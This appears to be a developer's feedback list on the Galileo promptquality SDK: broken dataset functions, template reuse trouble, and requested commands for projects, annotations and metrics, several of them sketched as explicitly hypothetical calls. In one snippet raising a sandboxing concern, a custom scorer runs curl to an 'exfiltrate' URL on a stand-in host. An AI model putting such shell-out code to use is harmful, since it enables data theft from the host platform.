The feedback system on the docs is not working (the Mintlify link is broken?). So here's a list of issues and enhancements I came across. Happy to have a chat about them.
- Documentation at https://docs.galileo.ai/galileo
- SDK - https://promptquality.docs.galileo.ai/
The functions `list_datasets()`, `get_dataset_content()` and `create_dataset()` are not working as documented:
```python
import os

import promptquality as pq

pq.login(os.environ["GALILEO_CONSOLE_URL"])

dataset = pq.create_dataset(
    {
        "virtue": ["benevolence", "trustworthiness"],
        "voice": ["Oprah Winfrey", "Barack Obama"],
    }
)
```
They keep asking for credentials; judging from the code, they are pass-throughs to the API, but they don't work well with the promptquality module's login.
- The function `upload_dataset()` is available in the SDK, but not documented.
- The template version id doesn't really seem to matter?
data = {"topic": ["Quantum Physics", "Politics", "Large Language Models"]}
from promptquality.helpers import upload_dataset
# The template version id doesn't really seem to matter ?
dataset = upload_dataset(data, project_id, template_version_id=template.selected_version.id)
print(dataset)
- Set the name of a dataset (currently only possible in the UI)
- Update a dataset (not possible now, but useful for keeping the same dataset id)
- Set the location (EU-east etc.) where the dataset is stored
- Point the dataset to an S3 bucket and the like, instead of a local upload (a rough sketch of what these could look like is below)
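Purely to illustrate these requests, here is the kind of SDK surface I have in mind; every function and parameter below that isn't in the current API is hypothetical.

```python
# Hypothetical sketch -- none of these parameters/functions exist in
# promptquality today; they only illustrate the requests above.
import promptquality as pq

# Name a dataset at creation time instead of only in the UI,
# and choose where it is stored (or point it at an S3 bucket).
dataset = pq.create_dataset(
    {"topic": ["Quantum Physics", "Politics"]},
    name="my-benchmark-v1",                  # hypothetical parameter
    region="eu-east",                        # hypothetical parameter
    # source="s3://my-bucket/topics.csv",    # hypothetical alternative to a local upload
)

# Update an existing dataset while keeping the same dataset id.
pq.update_dataset(                           # hypothetical function
    dataset_id=dataset.id,
    content={"topic": ["Quantum Physics", "Politics", "Large Language Models"]},
)
```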
Trouble reusing a template for a run:
Here's the code to create a template; that works fine:
```python
template = create_template(
    template_name="my-template",
    project_id=project_id,
    template="""Answer the question based only on the following context:
{context}
Question: {question}
""",
)
```
Retrieving the template works too:
```python
template = pq.get_template(project_name="my-project", template_name="my-template")
print(template)
```
The problem is in reusing that template for a run:
```python
run = pq.run(
    template=template.selected_version,
    template_name=template.name,
    dataset=data,
    settings=pq.Settings(
        model_alias='ChatGPT (16K context)',
        temperature=0.8,
        max_tokens=400,
    ),
)
```
I'm not sure what the right syntax is for this; this sample is not working and complains.
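My untested guess is that `pq.run()` may want the raw template text rather than the version object; whether the selected version exposes that text as `.template` is an assumption on my part, so treat the snippet below as a guess rather than a fix.

```python
# Untested guess: pass the raw template text instead of the version object.
# That `.template` holds the text of the selected version is an assumption.
run = pq.run(
    template=template.selected_version.template,
    template_name=template.name,
    dataset=data,
    settings=pq.Settings(
        model_alias='ChatGPT (16K context)',
        temperature=0.8,
        max_tokens=400,
    ),
)
```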
- command to list all templates
- make templates visible in the UI
- command to delete a template
- command to list all projects via the SDK, to allow automated cleanup
- command to delete a project via the SDK, to allow automated cleanup (a hypothetical cleanup sketch is after this list)
- allow for widening the description of a project in the UI
- allow for batch deletion of projects in the UI
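To make the cleanup use case concrete, this is roughly the script I'd like to be able to write; `list_projects()` and `delete_project()` are hypothetical names and don't exist in the SDK as far as I can tell.

```python
# Hypothetical cleanup script -- list_projects() and delete_project()
# do not exist in promptquality today; the names are illustrative only.
import promptquality as pq

for project in pq.list_projects():                # hypothetical
    if project.name.startswith("tmp-"):           # e.g. throwaway test projects
        pq.delete_project(project_id=project.id)  # hypothetical
        print(f"deleted {project.name}")
```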
- command to list all annotations via the SDK (a hypothetical sketch of these commands is after this list)
- command to create an annotation type via the SDK
- command to submit an annotation via the SDK (instead of only via the UI)
- command to delete an annotation via the SDK
- describe how to get the values of an annotation type via the SDK:
  - I found that the annotations, with their names, become part of the metrics attributes
- Reusing the same name for an annotation across projects is hard to keep track of, as annotations are not visible in the UI
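For the annotation wishlist, this is roughly what I'd hope the SDK could offer; every call below is hypothetical and the ids are placeholders.

```python
# Hypothetical annotation API -- none of these functions exist in
# promptquality today; project_id / run_id / row_id are placeholders.
import promptquality as pq

pq.create_annotation_type(                        # hypothetical
    project_id=project_id,
    name="tone",
    allowed_values=["formal", "casual"],
)

annotations = pq.list_annotations(project_id=project_id)  # hypothetical

pq.submit_annotation(                             # hypothetical
    run_id=run_id,
    row_id=row_id,
    name="tone",
    value="formal",
)

pq.delete_annotation(annotation_id=annotations[0].id)     # hypothetical
```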
- Ability to run non-local metrics with your own small models
- Make the metrics visible in the UI
- Function to get the value of a metric with a space in the name via the SDK
The workaround for now is:
```python
getattr(row.metrics, "Response Length")
```
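Purely as a convenience, the workaround could be wrapped in a small helper (the helper name is my own, not part of the SDK):

```python
# Small wrapper around the getattr workaround above; `metric_value`
# is my own helper name, not part of the SDK.
def metric_value(row, metric_name: str):
    """Return a metric value even when its name contains spaces."""
    return getattr(row.metrics, metric_name)

response_length = metric_value(row, "Response Length")
```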
- Not really a bug, but I wonder about the attribute pollution of the metrics object (using the name of the metric as the attribute name)
- When uploading Python code as a custom scorer, I would love to know that it can't execute shell commands or pollute other function calls (see the illustration below)
- I would want to know more details about the sandbox in which the code runs
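To illustrate the concern (the exact scorer signature aside, this is just the kind of code I'm worried about): nothing in the docs tells me whether an uploaded scorer like this would be blocked.

```python
# Illustration of the sandboxing concern -- would an uploaded custom scorer
# be allowed to shell out like this? The scorer signature is a placeholder.
import subprocess

def scorer(row) -> float:
    # A malicious or careless scorer could try to run arbitrary commands:
    subprocess.run(["curl", "https://example.com/exfiltrate"], check=False)
    return 1.0
```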
- Right now only a single key can be added, potentially leading to quota issues; it would be good to be able to override this per project / user
- Monitoring of quotas
- Metrics using an LLM as a judge can't be created via the SDK (a hypothetical sketch is below)
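For completeness, this is the kind of call I'd like for creating an LLM-as-a-judge metric from the SDK; the function and its parameters are hypothetical.

```python
# Hypothetical call -- LLM-as-a-judge metrics are currently UI-only,
# so create_llm_metric() does not exist in the SDK.
import promptquality as pq

metric = pq.create_llm_metric(                    # hypothetical
    project_id=project_id,
    name="politeness",
    judge_model_alias="ChatGPT (16K context)",
    prompt="Rate the politeness of the response from 1 to 5.",
)
```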